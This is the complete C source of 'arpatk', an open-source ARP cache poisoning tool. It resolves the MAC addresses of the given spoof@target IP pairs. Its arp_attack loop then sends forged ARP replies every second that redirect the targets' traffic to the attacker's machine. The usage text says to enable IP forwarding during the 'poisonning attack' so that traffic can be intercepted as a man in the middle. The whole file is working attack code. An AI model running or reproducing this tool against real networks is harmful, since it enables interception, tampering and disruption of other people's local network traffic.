/*
 *  arpatk
 *  src/arpatk.c
 *
 *  Copyright (C) 2011
 *
 *  Author: Vilmain Nicolas
 *  Contact: null.sim@gmail.com
 *
 *  This file is part of arpatk.
 *
 *  arpatk is free software: you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation, either version 3 of the License, or
 *  (at your option) any later version.
 *
 *  arpatk is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with arpatk.  If not, see <http://www.gnu.org/licenses/>.
 */

#include  "arpatk.h"
#include  <getopt.h>

static int   decode_program_options (int argc, char **argv, struct netconf_s *nc);
static int   parse_target (int argc, char **argv, struct in_addr mask);
static int   resolv_mac_address (struct netconf_s *nc);
static int   get_mac_address (struct netconf_s *nc, uint8_t *mac_dst,
			      struct in_addr ip_dst, const char *strip);
static int   arp_attack (uint8_t *mymac_addr);
static int   set_signal_handler (void);
static void  stop_program (int sig_num);
static void  free_global_ptr (void);
static void  make_arp_static (ARP *p, uint16_t opcode);
static void  set_arp_host (uint8_t *mac_src, struct in_addr *ip_src,
			   uint8_t *mac_dst, struct in_addr *ip_dst,
			   ARP *p);
static void  version (void);
static void  usage (void);

static struct target_s *target;
static struct target_s *tail;
static struct ethsock_s *sock;
static int restore_mac_addr;
static int atk_timer;
static int n_send;
static time_t atk_start;

int
main (int argc, char **argv)
{
  struct netconf_s nc;

  program_name = argv[0];
  tail = NULL;
  target = NULL;
  sock = NULL;
  atk_start = 0;
  n_send = 0;
  atk_timer = 0;
  restore_mac_addr = 1;
  if (decode_program_options (argc, argv, &nc)
      || resolv_mac_address (&nc) == -1
      || arp_attack (nc.nc_mac))
    {
      free_global_ptr ();
      return EXIT_FAILURE;
    }
  free_global_ptr ();
  return EXIT_SUCCESS;
}

static int
decode_program_options (int argc, char **argv, struct netconf_s *nc)
{
  char *device_name = NULL;
  char current_opt;
  struct option const long_opt[] =
    {
      {"help",             no_argument,        0,   'h'},
      {"version",          no_argument,        0,   'V'},
      {"timer",            no_argument,        0,   't'},
      {"device",           required_argument,  0,   'i'},
      {"no-restore",       no_argument,        0,   'n'},
      {0,                  0,                  0,   0}
    };

  do
    {
      current_opt = getopt_long (argc, argv, "hvi:t:n", long_opt, NULL);
      switch (current_opt)
	{
	case 'h':
	  usage ();
	  break;
	case 'v':
	  version ();
	  break;
	case 'i':
	  device_name = argv[optind - 1];
	  break;
	case 't':
	  if (xstrtol_positiv_value (optarg, &atk_timer))
	    return -1;
	  break;
	case 'n':
	  restore_mac_addr = 0;
	  break;
	}
    }
  while (current_opt != -1);
  if (argc == optind)
    {
      fprintf (stderr, "%s: not set target\ntry: %s --help form program usage\n",
	       program_name, program_name);
      return -1;
    }
  if (get_netconf (nc, device_name)
      || parse_target (argc, argv, nc->nc_ipv4)
      || set_signal_handler ())
    return -1;
  return 0;;
}

#define APPENDTOSTACK(tail, stack, new)		\
  do						\
    {						\
      if (!tail)				\
	stack = new;				\
      else					\
	tail->next = new;			\
      tail = new;				\
    }						\
  while (0)

static int
parse_target (int argc, char **argv, struct in_addr mask)
{
  char *buf = NULL;
  struct target_s *current = NULL;

  do
    {
      buf = strchr (argv[optind], '@');
      if (!buf || !*(buf + 1))
	{
	  fprintf (stderr, "%s: syntax argument invalid !\n",
		   program_name);
	  return -1;
	}
      *buf++ = 0;
      current = xcalloc (sizeof (struct target_s));
      APPENDTOSTACK (tail, target, current);
      if (!inet_pton (AF_INET, argv[optind], &current->ip_spoof))
	{
	  fprintf (stderr, "%s: invalid IP address <%s>\n",
		   program_name, argv[optind]);
	  return -1;
	}
      if (!inet_pton (AF_INET, buf, &current->ip_target))
	{
	  fprintf (stderr, "%s: invalid IP address <%s>\n",
		   program_name, buf);
	  return -1;
	}
      if (CHECK_MASK (&mask, &current->ip_spoof))
	{
	  fprintf (stderr, "%s: invalid network mask <%s>\n",
		   program_name, argv[optind]);
	  return -1;
	}
      if (CHECK_MASK (&mask, &current->ip_target))
	{
	  fprintf (stderr, "%s: invalid network mask <%s>\n",
		   program_name, buf);
	  return -1;
	}
      strncpy (current->str_ip_spf, argv[optind], (STR_IP_LEN - 1));
    }
  while ((argc - (++optind)));
  return 0;
}

static int
resolv_mac_address (struct netconf_s *nc)
{
  struct target_s *p_target = NULL;

  sock = xcalloc (sizeof (struct ethsock_s));
  if (get_ethsock (sock, nc->nc_index, nc->nc_name) == -1)
      return -1;
  p_target = target;
  do
    {
      if (get_mac_address (nc, p_target->mac_spoof,
			   p_target->ip_spoof, p_target->str_ip_spf)
	  || get_mac_address (nc, p_target->mac_target,
			      p_target->ip_target, NULL))
	return -1;
      p_target = p_target->next;
    }
  while (p_target);
  return 0;
}

static int
get_mac_address (struct netconf_s *nc, uint8_t *mac_dst,
		 struct in_addr ip_dst, const char *strip)
{
  ARP pkt;
  int n_test;
  int ret;
  char ip[17];

  if (strip)
    printf ("resolv mac address to ip %s ...\n", strip);
  else if (inet_ntop (AF_INET, &ip_dst, ip, 16))
    printf ("resolv mac address to ip %s ...\n", ip);
  fflush (stdout);
  memset (&pkt, 0, sizeof (ARP));
  make_arp_static (&pkt, ARP_OPCODE_REQUEST);
  set_arp_host (nc->nc_mac, &nc->nc_ipv4,
		BROADCAST_ADDR, &ip_dst, &pkt);
  memset (pkt.arp_mac_dst, 0, MAC_SIZE);
  if (ethsend (sock, &pkt, ARP_SIZE) == -1)
    return -1;
  n_test = 0;
  for (;;)
    {
      ret = ethrecv (sock->fdsock, &pkt);
#ifdef __Linux
      if (ret == -1 || n_test == 5)
#elif defined(__BSD)
      if (ret == -1 || n_test == 15)
#endif /* not __Linux */
	{
	  fprintf (stderr, "%s: mac address to ip <%s> not found\n",
		   program_name, (strip) ? strip : ip);
	  return -1;
	}
      else if (ret)
	{
	  if (!CMP_IP (pkt.arp_ip_src, &ip_dst))
	    {
	      COPY_MAC (mac_dst, pkt.eth_src);
	      return 0;
	    }
	}
      n_test++;
    }
  return 0;
}

static int
arp_attack (uint8_t *mymac_addr)
{
  ARP pkt;
  struct target_s *p_target = NULL;

  make_arp_static (&pkt, ARP_OPCODE_REPLY);
  atk_start = time (NULL);
  printf ("ARP attack started ! CTRL-C to stop\n");
  fflush (stdout);
  for (;;)
    {
      if (atk_timer)
	{
	  if ((time (NULL) - atk_start) >= atk_timer)
	    stop_program (-1);
	}
      p_target = target;
      do
	{
	  set_arp_host (mymac_addr, &p_target->ip_spoof,
			p_target->mac_target, &p_target->ip_target,
			&pkt);
	  if (ethsend (sock, &pkt, ARP_SIZE) == -1)
	    return -1;
	  printf ("%s is at %02x:%02x:%02x:%02x:%02x:%02x\n",
		  p_target->str_ip_spf, PRINT_MAC_ADDRS (mymac_addr));
	  fflush (stdout);
	  n_send++;
	  p_target = p_target->next;
	  sleep (1);
	}
      while (p_target);
    }
  return 0;
}

static int
set_signal_handler (void)
{
  struct sigaction sigact;

  memset (&sigact, 0, sizeof (struct sigaction));
  sigact.sa_handler = &stop_program;
  if (sigaction (SIGINT, &sigact, NULL) == -1)
    {
      fprintf (stderr, "%s:sigaction(SIGINT): %s\n",
	       program_name, strerror (errno));
      return -1;
    }
  return 0;
}

static void
stop_program (int sig_num)
{
  ARP pkt;
  struct target_s *p_target = NULL;

  if (sig_num > -1)
    puts ("\rsignal recvied, program stopped!");
  if (restore_mac_addr && atk_start)
    {
      p_target = target;
      puts ("restore original mac address ...");
      make_arp_static (&pkt, ARP_OPCODE_REPLY);
      do
	{
	  if (CMP_MAC (p_target->mac_spoof, NULL_MAC)
	      && CMP_MAC (p_target->mac_target, NULL_MAC))
	    {
	      set_arp_host (p_target->mac_spoof, &p_target->ip_spoof,
			    p_target->mac_target, &p_target->ip_target,
			    &pkt);
	      (void) ethsend (sock, &pkt, ARP_SIZE);
	      usleep (999999);
	      (void) ethsend (sock, &pkt, ARP_SIZE);
	    }
	  p_target = p_target->next;
	}
      while (p_target);
    }
  free_global_ptr ();
  if (atk_start)
    {
      printf ("total packet send: %d\n", n_send);
      printf ("totale time attack: %d second(s)\n",
	      (int) (time(NULL) - atk_start));
    }
  exit (EXIT_SUCCESS);
}

static void
free_global_ptr (void)
{
  struct target_s *p_next = NULL;

  if (sock)
    {
      close (sock->fdsock);
      free (sock);
    }
  if (target)
    {
      while (target)
	{
	  p_next = target->next;
	  free (target);
	  target = p_next;
	}
    }
}

static void
make_arp_static (ARP *p, uint16_t opcode)
{
  p->eth_protocol = htons (ETH_ARP);
  p->arp_hrd = htons (1);
  p->arp_protocol = htons (ETH_IP);
  p->arp_hln = MAC_SIZE;
  p->arp_pln = IP4_SIZE;
  p->arp_opcode = htons (opcode);
}

static void
set_arp_host (uint8_t *mac_src, struct in_addr *ip_src,
	      uint8_t *mac_dst, struct in_addr *ip_dst,
	      ARP *p)
{
  COPY_MAC (p->eth_src, mac_src);
  COPY_MAC (p->eth_dst, mac_dst);
  COPY_MAC (p->arp_mac_src, mac_src);
  COPY_MAC (p->arp_mac_dst, mac_dst);
  COPY_IP (p->arp_ip_src, ip_src);
  COPY_IP (p->arp_ip_dst, ip_dst);
}

static void
version (void)
{
  puts ("arpatk version 1.0");
  exit (EXIT_SUCCESS);
}

static void
usage (void)
{
  printf ("USAGE: %s spoof@target spoof2@target2 ... OPTIONS\n\n"
	  "Set target:\n"
	  "  - defined target and spoofing address : ip_spoof@ip_target\n"
	  "  - specified multi couple spoof@target it's possible !\n"
	  "  - need active ip forwarding during the poisonning attack\n"
	  "    for send packet at the real target\n\n"
	  "Arguments\n"
          "  -h, --help              : print help menu and exit\n"
          "  -v, --version           : print version and exit\n"
          "  -i, --device  [DEVICE]  : set network device\n"
	  "  -n, --no-restore        : don't restore original mac address\n"
	  "  -t, --timer [TIME]      : set time to attack exec.\n",
          program_name);
  exit (EXIT_SUCCESS);
}
